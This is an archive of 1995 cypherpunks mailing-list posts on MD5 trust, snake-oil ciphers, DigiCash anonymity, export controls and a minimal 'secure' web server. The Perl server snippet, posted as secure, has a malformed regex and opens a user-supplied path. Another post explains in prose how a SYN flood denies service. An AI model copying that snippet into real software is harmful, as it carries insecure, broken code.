Maybe the FBI's responsibility for US counter-intelligence is meant as a 
double-entendre?

C. J. Leonard                     (    /      "DNA is groovy"
                                   \ /                - Watson & Crick
<cjl@welchlink.welch.jhu.edu>      / \     <--  major groove
                                  (    \
Finger for public key               \   )
Strong-arm for secret key             /    <--  minor groove
Thumb-screws for pass-phrase        /   )





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Tue, 24 Oct 95 15:39:02 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: Does your software?
In-Reply-To: <9510241549.AA19649@all.net>
Message-ID: <199510242238.SAA19929@clark.net>
MIME-Version: 1.0
Content-Type: text/plain



  Umm, your get only server sounds like it is secure, but what is the
point advertising it to this list? I could program a GET only
server in far fewer than 80 lines in just a few hours. You could
do it in even fewer lines of perl, or /bin/sh. A real HTTP server
must support all of HTTP/1.0 however for it to be considered a server.
Since yours doesn't, it isn't, it's just a toy. a better project would be
to make HTTP requests under CERN more secure.  In fact, if you don't
handle CGI, you can't handle forms, which means you can't handle
commerce securely.



secure perl "get only" server server
copy perl to a secure filesystem
have a chroot c-wrapper there
the wrapper chroot's to this directory and runs the perl script
perl is effectively boxed in


#!/securedir/perl

$line = <STDIN>;
($method, $url, $protocol)=split(/\s+/, $line);
$url =~ s/[^a-zA-Z0-9_]/g;
if($method =~ /^GET/i)
{
   open(FILE, "$url");
   print "HTTP/1.0 200 OK\nContent-Type: text/html\n\n";
   print <FILE>;
   close(FILE);
}

exit 0;


 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Tue, 24 Oct 95 10:46:44 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: MD5 weakness ? [was Re: Netscape Logic Bomb detailed by IETF]
In-Reply-To: <9510241425.AA08815@hplyot.obspm.fr>
Message-ID: <9510241745.AA10318@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain


<grrrrrrr>

Frederick B. Cohen writes:
 > >  > [...] uses an MD5 checksum which the members
 > >  > of this list seem to place unlimited trust in (incorrectly in my view,
 > >  > but that would be picking two nits with one keyboard entry).

[me]> Can you elaborate WITH FACTS on the supposed weakness of MD5 ?
                        **********
I wonder what is your definition of facts...

 > I didn't say that there were any weaknesses in MD5, all I said was:
 > 	"unlimited trust ... (incorrectly in my view...)"
 > 
 > The lack of adequate demonstration of strength is not the same as a
 > weakness.  It represents only a lack of adequate assurance for placing
 > more than a certain amount of trust in MD5 for the purpose it is being
 > used to accomplish.
 > 
 > As to weaknesses, I seem to remember that someone managed to forge a
 > modification to a program used to observe networks on a Sun so that it
 > had the same MD5 checksum as the official trusted version.  But whether
This is absolute bullshit with a probability of (2^128-1)/2^128
 > this is real is not strictly the issue. 
On the contrary real things should be the issue... not random thoughts

 > In the case of the trust being placed in MD5 by Netscape, the assumption
 > being made (without adequate support as far as I can tell) is that an
because you can't tell 1+1=2 doesn't imply people have to worry...
 > MD5 checksum cannot be forced, through a chosen plaintext attack, to
 > yield checksums of 1, 2, 3, 5, 7, 9, ...  on up to enough primes to
 > allow the known plaintext attack that gets the RSA private key used to
 > authenticate messages.  As far as I am aware (and I may not be aware of
 > everything) there is no reference work to support this assumption.  If
The fact that you obviously didn't take the time to do any
search/reading on the subject does not allow you to go on with mad
assumptions... 
 > the assumption is wrong, then the whole SSL can fall to a selected
 > plaintext attack launchable (presumably) through those general purpose
 > Java aplets we have heard so much about.
FYI,  ( false => false ) is a true expression... starting from false
assumption you can demonstrate *anything*
{ if 1+1!=2, lots of things "fall"}
 [me]> [btw who talked about 'unlimited' trust ?]
 > There has been no limit given by anyone on this list to the level of
 > trust they place in MD5.  Several people have posted (without
 > contention) that MD5 is sufficiently trustworthy to trust billions of
 > dollars in commerce to it's being able to prevent a selected plaintext
 > attack as eluded to above.  If you think we should trust it, and you
 > don't limit your assessment of trust, what other assumption should I
 > make? If several people proclaim that trust and nobody stands up in
 > disagreement, tacit agreement is my normal (although not necessarily
 > justified) assumption. 

AGAIN, the limit is 2^128 computer operations (as I quoted from the rfc
days ago), which is imo certainly NOT the weakest part of the security
chain...

Do you actually read anything people are mailing or writing ?
</grrrrrrr>

sorry again, I feel tested...

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

cracking SEAL Team 6 counter-intelligence DES Pasqua Qaddafi class
 struggle




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Tue, 24 Oct 95 15:54:11 PDT
To: rjc@clark.net (Ray Cromwell)
Subject: Re: Does your software?
In-Reply-To: <199510242238.SAA19929@clark.net>
Message-ID: <9510242251.AA05075@all.net>
MIME-Version: 1.0
Content-Type: text


>   Umm, your get only server sounds like it is secure, but what is the
> point advertising it to this list?

I wasn't advertising.  I was simply answering questions brought up about
my secure W3 server by another person who posted to the list.  For some
reason they thought that they should bring it into the discussion, so I
responded. 

> I could program a GET only
> server in far fewer than 80 lines in just a few hours.

As I have said many times to many others, please go ahead and do it.  I
only wrote the secure server to demonstrate that it was no big deal to
have a secure server and to ease my own fears about protecting all.net
from outside attacks like the ones with buffer overflows.  The source is
on-line and available to anyone, and I only ask a fee if you decide to
use it for commercial purposes.  Nobody has paid me yet, and I assume
they never will.

> You could
> do it in even fewer lines of perl, or /bin/sh.

But how would you demonstrate the security properties?

> A real HTTP server
> must support all of HTTP/1.0 however for it to be considered a server.

It's a secure get-only server.  It only handles 99+% of the real uses of
web servers.

> Since yours doesn't, it isn't, it's just a toy. a better project would be
> to make HTTP requests under CERN more secure.

I agree, but rather than redesign their server, I wrote my own in a few
hours and made it available as an example.  I think that CERN should
make their server secure.

>  In fact, if you don't
> handle CGI, you can't handle forms, which means you can't handle
> commerce securely.

I now do handle forms (another separate 100 line server not yet released).
Please see the experimental version on-line at all.net.

> secure perl "get only" server server
> copy perl to a secure filesystem
> have a chroot c-wrapper there
> the wrapper chroot's to this directory and runs the perl script
> perl is effectively boxed in

My secure server includes the chroot  and setUID code in it.  Your C-wrapper
would be part of your code - that adds several lines.  And I don't need Perl
which I think makes it much more secure.  (There I go casting doubts on Perl
security!)

> #!/securedir/perl
> 
> $line = <STDIN>;
> ($method, $url, $protocol)=split(/\s+/, $line);
> $url =~ s/[^a-zA-Z0-9_]/g;
> if($method =~ /^GET/i)
> {
>    open(FILE, "$url");
>    print "HTTP/1.0 200 OK\nContent-Type: text/html\n\n";
>    print <FILE>;
>    close(FILE);
> }
> 
> exit 0;

Pretty close, but you don't provide any protection against denial of
services (e.g.  by openning up 1024 simultaneous sessions and leaving
them open indefinately) against accessing files that aren't there (you
need an error message of some sort - mine does a redirect to the home
page), you don't enforce access controls on the host machine, there may
be buffer overflows associated with long requests, you don't handle some
possible URLs, you don't seem to handle the default URL, you don't
identify the kind of error that caused the failed access, and you don't
provide an audit trail.  Add those and I'll look again to see if there
are other possible problems.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 24 Oct 95 16:08:12 PDT
To: privsoft@ix.netcom.com (Steve )
Subject: Re: Reformated: How secure....
In-Reply-To: <199510241425.HAA20039@ix3.ix.netcom.com>
Message-ID: <199510242307.TAA07020@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Steve writes:
>     2. Re: the 9 digit key.
>         Partially why you misunderstand the strength of the 9 digit key 
> in PrivaSoft is b/c Graphical Encryption is very different form data 
> encryption.

That indicates to me that you don't understand anything at all about
cryptography. I'm not trying to be cruel. People around here have seen
me cruel. Its just that bits are bits and it doesn't matter what you
are encrypting. You seem to think that because images "need humans" to
determine if they make sense that you have somehow won -- in fact,
the statistics of real vs random images are so different that I can
hardly see how one could have an easier time of it.

Amateurs pretending that they are professionals going out and selling
snake-oil crypto are one of the biggest threats in our business. I
doubt that you are going to relent -- folks in your position have an
amazingly stubborn ability to ignore reality -- but I think anyone
buying your product is crazy.

> I fully believe 
> that if any of those who believe that PrivaSoft is a fly-by-night or 
> bogus product have not looked at or tried the software and therfore 
> speak from less than a knowledgable position.

Reading your messages is sufficient, actually. If I read something
from someone pretending to be a doctor and he notes that his new blood
thinning machine is useful for curing baldness, I don't really have to
try the product, now, do I.

I suspect it would take a real cryptographer very little effort to
break your system, but that no one will bother doing so because it
isn't really worth anyone's time.

> I have 
> personnally demonstrated are software to several key individuals in the 
> gov't, military, and corperate arenas both executive and technical 
> persons. All were impressed have taken the software back for further 
> testing.

Who cares? I know places where you can demonstrate psychic surgery and
get dozens of people to vouch for it.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 24 Oct 95 16:38:31 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: MD5 weakness ? [was Re: Netscape Logic Bomb detailed by IETF]
In-Reply-To: <199510241554.LAA27916@opine.cs.umass.edu>
Message-ID: <199510242338.TAA07052@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Futplex writes:
> I believe Dr. Cohen's point is that no-one knows, AFAIK, how to prove that a
> one-way hash is truly one-way (uninvertible). We cannot prove that MD5 is
> secure, ergo we cannot (completely) trust it. [Please correct if this is a
> substantially incorrect inference.]

There are hashes that can, in fact, be proven to have the properties
we assign to cryptographic hashes given certain modest assumptions
about some number theory problems and their complexity. True "proof"
is likely impossible.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Name Withheld by Request)
Date: Tue, 24 Oct 95 11:55:18 PDT
To: cypherpunks@toad.com
Subject: Re: Hack DigiCash: Payee Anonymity
In-Reply-To: <199510240750.IAA04175@utopia.hacktic.nl>
Message-ID: <199510241855.TAA14733@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


David R. Conrad <drc@russell.moore.com> wrote:

> If the payer doesn't add a blinding factor, then the only blinding factor
> is the one known to the payee.  The payee could reveal this blinding
> factor to the bank, destroying the payer's anonymity.

Right.  Both payer and payee should introduce their own blinding factors.

Now all we need is to do is get some specs on how DigiCash's software works
so that we can code this.  I expect that this method will become quite
popular.  To withdraw DigiCash, one must come up with $250 to start, sign a
bunch of forms, etc.  I suspect that most people would rather change money
in lesser amounts, probably under $50.  This opens up a huge market for
Blacknet money exchangers.  I would gladly pay Tim's Internet Cash Exchange
a commission to exchange $50 worth of greenbacks for Digicash instead of
dealing with Mark Twain and shelling out $250 to start..





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Name Withheld by Request)
Date: Tue, 24 Oct 95 12:10:20 PDT
To: cypherpunks@toad.com
Subject: Re: Welcome to c|net
In-Reply-To: <199510241603.JAA10729@orpheum.cnet.com>
Message-ID: <199510241910.UAA15096@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


> From cypherpunks@toad.com  Tue Oct 24 09:03:00 1995
> Received: from cnet.com (central.cnet.com [204.188.123.10]) by
>  orpheum.cnet.com (8.6.12/8.6.12) with ESMTP id JAA10708 for
>  <verify@orpheum.cnet.com>; Tue, 24 Oct 1995 09:03:00 -0700
> Received: from longs.lance.colostate.edu by cnet.com via ESMTP
>  (8.6.12/940518.SGI.central)
>         for <verify@cnet.com> id OAA10916; Tue, 24 Oct 1995 14:53:01 GMT
> Received: from [204.131.233.49] (p49.Denver1.dialup.csn.net
>  [204.131.233.49]) by longs.lance.colostate.edu (8.6.12/8.6.5a (LANCE
>  Revision: 1.3)) with SMTP id KAA07689 for <verify@cnet.com>; Tue, 24 Oct
>  1995 10:02:06 -0600

Well, lookie, it came from csn.net via longs.lance.colostate.edu.  Now who
do we know at that address?

Grow up Larry.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Tue, 24 Oct 95 20:57:16 PDT
To: sommerfeld@orchard.medford.ma.us
Subject: Re: textbooks
Message-ID: <9510250353.AA08472@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> > The quick proof of why the initial and final permutations add nothing to 
> > the security of DES is presented in an informal and quite obvious sidebar.
> 
> Actually, I found the proof not completely convincing.  It's really a
> proof that it doesn't strengthen the DES against a *known plaintext*
> attack, but there are other weaker attacks it may make marginally more
> difficult (or easier..); for instance, partially-known plaintext or
> some forms of verifiable plaintext.
> 

I'm afraid I'm not quite following you here, could you expound a bit?

Ah:) Isn't it great to be talking about encryptions again?:)

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Flame Remailer <remailer@flame.alias.net>
Date: Tue, 24 Oct 95 13:22:58 PDT
To: elementrix.co.il.info@elementrix.co.il
Subject: Elementrix's so-called "Power One Time Pad"
Message-ID: <199510242011.VAA16761@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Essentially what these guys are selling is a secret key algorithm in which
the key for any given message is a function of some initial seed value,
and of hashes of all previous messages transmitted between the two parties.
So in theory, to break the code, one would need to know not only their
initial key, but also all of the messages trasmitted between them so far.
A similar result can be achieved by encrypting with PCBC, or other feedback
mode involving plaintext, and carrying the IV from the end of one session
to the beginning of the next.  This is not, of course, a one-time pad, and
hardly "groundbreaking" or "revolutionary".

While such a system could be designed securely in theory, the folks at
Elementrix appear to have little experience at designing secure
cryptographic systems.  Cryptographic systems designed by such novices
frequently have bugs in the implementation which weaken the security
offered, or have statistical weaknesses which allow cryptanalytic attack. 
Elementrix has offered no assurances that they have tested their system
for either.  Beware of snake oil.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Lynne L. Harrison" <lharrison@mhv.net>
Date: Tue, 24 Oct 95 18:09:09 PDT
To: cypherpunks@toad.com
Subject: Re: Verification of Registration
Message-ID: <9510250110.AA00113@mhv.net>
MIME-Version: 1.0
Content-Type: text/plain


At 11:02 AM 10/24/95 -0500, you wrote:
>Everybody who receives mail from cypherpunks@toad.com received this
>message becuase the message was addressed to 
>cypherpunks@toad.com.  Apparently someone may have 
>joined this 'group' or service and used the cypherpunks address as 
>the e-mail address.  Mayhap the cypherpunks@toad.com / cypherpunks
>userid/password. 
>
>This would be my guess, of course.
>
>Does anybody know what this service does?
>

  Makes sense given the numbers that also received the message.
  C|Net has a web site and a weekly program on cable about the Net. I saw it
{the show) once.  Nothing to recommend - silly stuff like URL's for the weather.


Regards -
  Lynne


********************************************************************
Lynne L. Harrison, Esq.
Poughkeepsie, New York 
lharrison@mhv.net

"Say not, 'I have found the truth', but rather, 'I have found a truth.'"
                         - Kahlil Gibran from "The Prophet"
********************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stanton McCandlish <mech@eff.org>
Date: Tue, 24 Oct 95 21:28:42 PDT
To: cypherpunks@toad.com
Subject: QUERY: dc-nets list?
Message-ID: <199510250428.VAA08317@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


Please reply to me (or cc me if you respond to list).

If anyone happens to know where (if anywhere) the dc-nets list has moved 
to, and how to subscribed, I'd really appreciate a pointer. Need to 
update the entry for that in a FAQ I maintain.  TTYL.

--
<HTML><A HREF="http://www.eff.org/~mech/">    Stanton McCandlish
</A><HR><A HREF="mailto:mech@eff.org">        mech@eff.org
</A><P><A HREF="http://www.eff.org/">         Electronic Frontier Foundation
</A><P>       Online Activist    </HTML>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Tue, 24 Oct 95 21:40:12 PDT
To: Jon Mittelhauser <jonm@netscape.com>
Subject: Re: Does your software?
In-Reply-To: <308D0DA4.7ED@netscape.com>
Message-ID: <Pine.SOL.3.91.951024210756.18616A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 24 Oct 1995, Jon Mittelhauser wrote:

> Dr. Frederick B. Cohen wrote:
> 
> > Yet it services more than one request per minute, 24 hours, 7 days, and
> > has done so without denial of services, corruption, or leakage since its

> I really tried to resist but....
> 

Thanks for saving me from the temptation but I guessed you were so taken 
aback by the performance claims that you missed the most amazing claim: 
an httpd that is proof against Denial Of Service. I'd love to know how 
Dr. Fred does this, since DoS is believed impossibly to defend against 
for unauthenticated TCP...

The usual DoS attack is to send a stream of connection-initiating SYNs to 
the target port, and never ACK the returned SYN. This fills up the listen 
queue, and jams the port. As long as you can generate SYNs faster than 
the TCP implementation times out the older pending requests, the port is 
jammed (modulo a small window of, er, invunerability between one of your 
SYNs timing out and its replacement turning up). 

Ob Crypto:

  Has anybody thought about running Photuris over a TCP connection to do 
application-level key-exchange? The cookie stuff isn't really needed in 
this application, but it's still quite a nice wheel.

Simon

 -----
(defun modexpt (x y n)  "computes (x^y) mod n"
  (cond ((= y 0) 1) 	((= y 1) (mod x n))
	((evenp y) (mod (expt (modexpt x (/ y 2) n) 2) n))
	(t (mod (* x (modexpt x (1- y) n)) n))))





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nesta Stubbs <nesta@cynico.com>
Date: Tue, 24 Oct 95 20:02:23 PDT
To: "Dr. Frederick B. Cohen" <fc@all.net>
Subject: Re: Netscape Logic Bomb detailed by IETF
In-Reply-To: <9510231413.AA26514@all.net>
Message-ID: <Pine.BSD.3.91.951024214619.20203D-100000@miso.wwa.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 23 Oct 1995, Dr. Frederick B. Cohen wrote:

> > Yes, Mr. Anonymous, we all know postscript is dangerous. Thank you for
> > this stunning revelation. We've read the IETF documents before, and
> > some of us even helped write them.
> 
> Then you should support his point which is valid.
> 
I don't think they have vested interests at all.  I think that they are 
able to see that the problem is not with the browser.  You know 
"/bin/login" is insecure because it allows hooks for unpasswded logins, I 
mean if the user wanted to they could leave root unpasswded and if they are 
using "/bin/login" someone could get into their system just like that.

That point is NOT valid IMO.  

> I strongly disagree.  If Netscape provided a way to execute shell
> commands on your host from a remote computer, it would certainly be a
> hole created by their product.  The fact that the default shell is
> potentially dangerous means it's incumbant on those who provide access
> to it to provide adequate protection.
>
NO, postscript provides the method for executing shell commands if you 
accept postscript from anywhere.  Netscape can NEVER be "fool"proof 
against all hardware errors, particularly loose nuts on the keyboard.



Nesta Stubbs		     "Betsy, can you find the Pentagon for me? 
Cynico Network Consulting     It has five sides and a big parking lot" 
nesta@cynico.com			-Fred McMurray-





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Tue, 24 Oct 95 22:13:58 PDT
To: cypherpunks@toad.com
Subject: CJR returned to sender
Message-ID: <199510250513.WAA20962@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I got the CJR back today, envelope unopened (although the corner was
torn so you could see there were t-shirts inside). "Returned to sender",
it said, "Refused___, Unclaimed___".

   The address on the envelope reads:

ATTN: Samuel L. Capino - 15 day CJR
Defense Trade Analyst
U.S. Dept. of State
Office of Defense Trade Controls
PM/DTC SA-6 Room 200
1701 N. Fort Meyer Drive
Arlington, CA 22209-3113

   Did I do something wrong, or did the Dept. of State decide it
didn't want to deal with this CJR?

Raph




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Sommerfeld <sommerfeld@orchard.medford.ma.us>
Date: Tue, 24 Oct 95 19:48:20 PDT
To: "baldwin" (Robert W. Baldwin) <baldwin@rsa.com>
Subject: Re: 80 bit security from 40 bit exportable products
In-Reply-To: <9509248145.AA814557096@snail.rsa.com>
Message-ID: <199510250243.CAA00966@orchard.medford.ma.us>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> For example, a web client might fetch an S-HTTP page over an SSL
> protected link via a firewall that supports IPsec tunnels.  That's
> three 40 bit keys protecting the data over the internet link (of
> course, this may not be equivalent to a 120 bit cipher, that depends
> on the details of the cipher systems and independence of the key
> setups).

C'mon Bob.. how long has it been since you picked a lock? :-)

Given the likely presence of known or verifiable plaintext at each
nesting level, a three-deep nesting of 40-bit ciphers like this
probably increases the strength to about, ohh, a 42 bit cipher.

						- Bill


-----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQCVAwUBMI2kGrT+rHlVUGpxAQEKzwP+N7TlofhbYgHXycj7KCdpLhXFzZpnqlCB
ce/3ng9e4zN9G+lX/zpEeH/muhVkKFOwpaadYBKrn7Mu63dT0guCFNlApo9AMagU
xcLHex5AsKM3tWCayiTN5TP14bxEx2jSR54jSJIKsfulkpYRK0LYGj/fc5mSH8iP
r9qXBCrp7xA=
=QtVF
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Tue, 24 Oct 95 22:53:32 PDT
To: cypherpunks@toad.com
Subject: Re: Mark Twain Bank (was: Anonymity: A Modest Proposal)
In-Reply-To: <199510241356.GAA01427@jobe.shell.portal.com>
Message-ID: <199510250551.WAA29912@netcom12.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Someone writes:

 >My
 >understanding is that the _bank account_ is FDIC insured, but not
 >the ECash. I could be wrong -- their materials are extremely confusing
 >and hard to follow.

I read the entire lengthy contract and found quite a few things
which appear to be designed to cover the bank's posterior.

1.  Both parties stipulate that their relationship is a 
    business relationship and not a fiduciary relationship.

2.  Your account is not FDIC insured. 

3.  The bank accepts no liability for anything going wrong, 
    although it may, at its sole option, attempt to make
    ammends.

4.  Parties agree to wave a jury trial.

5.  Parties agree to binding arbitration. 

6.  General waffling to the effect that the tiny fees collected
    imply an equally tiny responsiblity and potential liability
    on the part of the bank.  

Now most of this language also appears in the fine print of the
First Virtual agreement, so it is not like you have an option
of trading on the Internet under the rules which govern your
ordinary checking account. 

One wonders whether signing away all responsibilty on the part of
the bank is going to be the standard for using digital money
on the Internet, or whether consumers will demand protection
when using these new services.  

One has to be careful that when new technology replaces old, the 
privacy protection which applied to the old also applies to the
new.  Good examples of this in the past are the ways in which the 
rights you have to the privacy of paper mail generally fail to 
be extended to Email, and of course "regulation E", which exempted
bank accounts which were capable of Electronic Funds Transfer from
a great deal of the protection which used to govern users of
ordinary checking accounts. 

On the brighter side, Dr. Chaum's success in convincing someone
to back DigiCash with actual US dollars certainly makes advances
in breaking public key cryptography worth a great more than the
tiny prizes currently offered by RSADSI. 

It will be interesting to see how this all works out in the
next few months.  Arjen Lenstra is planning on factoring RSA-130
on the Web for a high performance computing conference later this
year.  This should lead to some very robust estimates for the
amount of computing power needed for GNFS to break 512 bit PGP
keys.  

Does anyone know the details of the DigiCash protocol, or how
much computing power it would take someone to make counterfeit coins?  

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marshall Clow <mclow@coyote.csusm.edu>
Date: Tue, 24 Oct 95 23:00:16 PDT
To: Jonathon Fletcher <jonathon@doemail.sbi.com>
Subject: Re: Quick commercial package question
Message-ID: <v03003704acb381c20617@[204.250.84.3]>
MIME-Version: 1.0
Content-Type: text/plain


Somebody who might be "Jonathon Fletcher" <jonathon@doemail.sbi.com> said:
>
>  There's a compression/archiving package on the Mac call Stuffit.
>
>  Question is - does anyone know anything about the strength or
>trustability of the encryption algorithm used ? It's freely exportable
>from the US (or so I thought) so it can't be DES. Is it (down) on a level
>with the MS Word or Wordperfect ciphers, or is it a little better ? How
>far should I trust it ?
>
Well, that's an interesting question.
On one hand, it's a proprietary encryption algorithm, written by a bright
17 year old.

On the other hand, there have been no reported cracks, no "decrypt your
encrypted archives" programs like there are for MS Word, or WordPerfect.
(Maybe it's hard, maybe no one cares.)
[ Late breaking news: "t byfield" reported one; it appears not to work. ]

On the gripping hand, there was no trouble getting export approval.

Many people/companies put encrypted Stuffit archives up for anonymous ftp.
(Beta versions of executables, etc)

How far should you trust it?
That's up to you.

-- Marshall
Aladdin Systems, maker of Stuffit Deluxe, etc.

Disclaimer:  There is no way that this can be considered an official
statement of Aladdin Systems.

Marshall Clow
Aladdin Systems
mclow@coyote.csusm.edu
Warning: Objects in calendar are closer than they appear.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marshall Clow <mclow@coyote.csusm.edu>
Date: Tue, 24 Oct 95 22:58:44 PDT
To: tbyfield@panix.com (t byfield)
Subject: Re: Quick commercial package question
Message-ID: <v03003705acb381e70ed9@[204.250.84.3]>
MIME-Version: 1.0
Content-Type: text/plain


>At 12:34 PM 10/25/95, Jonathon Fletcher wrote:
>>Just a brief question.
>>
>>  There's a compression/archiving package on the Mac call Stuffit. It
>
>        <...>
>
>>from the US (or so I thought) so it can't be DES. Is it (down) on a level
>>with the MS Word or Wordperfect ciphers, or is it a little better ? How
>>far should I trust it ?
>
>        Not at all. Take a look at:
>
>        http://www.uccs.edu/~abusby/mac_u-g/RemoveIt.sit.bin
>
Ted --

Thanks for bringing this to my attention. I wasn't aware of any cracking
program for Stuffit archives. If you know of any others, please let me
know.

I just finished trying this one, though. It doesn't work.

Here's a some background on Stuffit archives:
There have been three different formats for Stuffit files over the past 8
(has it really been 8?) years.

1)   Version 1.5.1. The original
2)   Version 2.0    Short lived. No longer used.
3)   Version 3.0    The Current version. First shipped in 1992 (I think)

The crack described at the above URL does not work for 1.5.1 archives.
It also does not work for 3.0 archives.
I don't have any 2.0 archives handy, but I will test them in the morning.

It is possible that the cracking technique described at the above URL will
work for 2.0 archives. However, none of Aladdin's shipping software will
generate 2.0 archives, and Aladdin supplies a (free) converter from 1.5.1
and 2.0 archives to 3.0 archives. (They get smaller when converted, too!)

-- Marshall
Aladdin Systems, maker of Stuffit Deluxe, etc.

Disclaimer:  There is no way that this could possibly be considered an
official statement of Aladdin Systems.


Marshall Clow
Aladdin Systems
mclow@coyote.csusm.edu
Warning: Objects in calendar are closer than they appear.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Tue, 24 Oct 95 23:02:21 PDT
To: cypherpunks@toad.com
Subject: Re: CJR returned to sender
Message-ID: <199510250602.XAA20850@desiree.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:13 PM 10/24/95 -0700, you wrote:
>   I got the CJR back today, envelope unopened (although the corner was
>torn so you could see there were t-shirts inside). "Returned to sender",
>it said, "Refused___, Unclaimed___".
>
>   Did I do something wrong, or did the Dept. of State decide it
>didn't want to deal with this CJR?

That is what you get for warning people in advance!  (I would say that they
"skirted" the issue, but that is not a-dress-ed here...) Maybe they read the
list and knew what you were up to. Why else would they refuse free t-shirts?
(Or maybe they had already talked with Netscape that week...) ];>

|       Visualize a world without lawyers!        | alano@teleport.com   |
|"The moral PGP Diffie taught Zimmerman unites all| Disclaimer:          |
| mankind free in one-key-steganography-privacy!" | Ignore the man       |
|   -- PGP 2.6.2 key available on request --      |  behind the keyboard.|
|         http://www.teleport.com/~alano          |       <fnord>        |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Sommerfeld <sommerfeld@orchard.medford.ma.us>
Date: Tue, 24 Oct 95 20:17:57 PDT
To: patrick@verity.com (Patrick Horgan)
Subject: Re: textbooks
In-Reply-To: <9510242121.AA07455@cantina.verity.com>
Message-ID: <199510250308.DAA01044@orchard.medford.ma.us>
MIME-Version: 1.0
Content-Type: text/plain


I meant to bring this up with Charlie Kaufman and Radia Perlman when I
got the book, but never got around to it..

The following line of thinking was inspired by the NSA "patch" to SHA:
the addition of a rotate-left-one-bit operation to each round of SHA,
which yields faster mixing between values in bit positions within the
input.

> The quick proof of why the initial and final permutations add nothing to 
> the security of DES is presented in an informal and quite obvious sidebar.

Actually, I found the proof not completely convincing.  It's really a
proof that it doesn't strengthen the DES against a *known plaintext*
attack, but there are other weaker attacks it may make marginally more
difficult (or easier..); for instance, partially-known plaintext or
some forms of verifiable plaintext.

The FP/IP don't add *much* security, but I'm not about to say that
they add *no* security.

> The comment is made that by the same argument the permutation of the key
> in the generating of per-round keys also adds nothing to security.

Again, their proof assumed that all the bits of the key are
independant and unbiased -- which they will be if you're careful, but
won't be if you're stupid.

Remember that the NSA designs ciphers for use by people with a high
school diploma or less :-).

					- Bill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 24 Oct 95 23:21:12 PDT
To: cypherpunks@toad.com
Subject: Re: CJR returned to sender
Message-ID: <acb323bd030210041822@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:13 AM 10/25/95, Raph Levien wrote:
>   I got the CJR back today, envelope unopened (although the corner was
>torn so you could see there were t-shirts inside). "Returned to sender",
>it said, "Refused___, Unclaimed___".
>
>   The address on the envelope reads:
>
>ATTN: Samuel L. Capino - 15 day CJR
>Defense Trade Analyst
>U.S. Dept. of State
>Office of Defense Trade Controls
>PM/DTC SA-6 Room 200
>1701 N. Fort Meyer Drive
>Arlington, CA 22209-3113
>
